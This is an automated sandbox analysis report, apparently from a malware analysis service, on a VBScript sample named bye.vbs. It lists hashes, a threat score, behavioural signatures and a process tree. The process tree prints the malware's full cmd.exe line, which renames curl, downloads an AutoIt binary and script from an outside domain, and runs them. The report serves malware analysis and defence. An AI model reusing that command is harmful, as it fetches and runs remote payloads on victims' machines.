Analysis
-
max time kernel
315s -
max time network
405s -
platform
windows10-1703_x64 -
resource
win10-20230915-de -
resource tags
-
submitted
03/10/2023, 09:59
General
-
Target
bye.vbs
-
Size
19KB
-
MD5
a19d814f720701a258a6e8b5a22b22c9
-
SHA1
cbdcdefb3328f1473bb1da624ed2bf9515ffd2c3
-
SHA256
7d4115e88411e7bcac9ed622dbb6554ff4015c6f9fed98a5427970ceada526e6
-
SHA512
51b2a31f0c4fce15d87d1ab88d8e383ee7f8be0e9075183a22c6bfcca48dd30d43ca7987baf3c811ab11a4132199a31213d3096c91a645127f13b7703d3bd044
-
SSDEEP
384:fwcem3DxZbJ6TZZfOEcMR/vuvP3RhbWbdVIIo+T6ncfzeQhs7h7:YcXZ16/+MRSbbaX9yp7h7
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious use of WriteProcessMemory 2 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bye.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir c:\dcvj & cd /d c:\dcvj & copy c:\windows\system32\curl.exe dcvj.exe & dcvj -H "User-Agent: curl" -o Autoit3.exe http://searcherbigdealk.com:2351 & dcvj -o thnzyn.au3 http://searcherbigdealk.com:2351/msidcvjgknu & Autoit3.exe thnzyn.au32⤵
-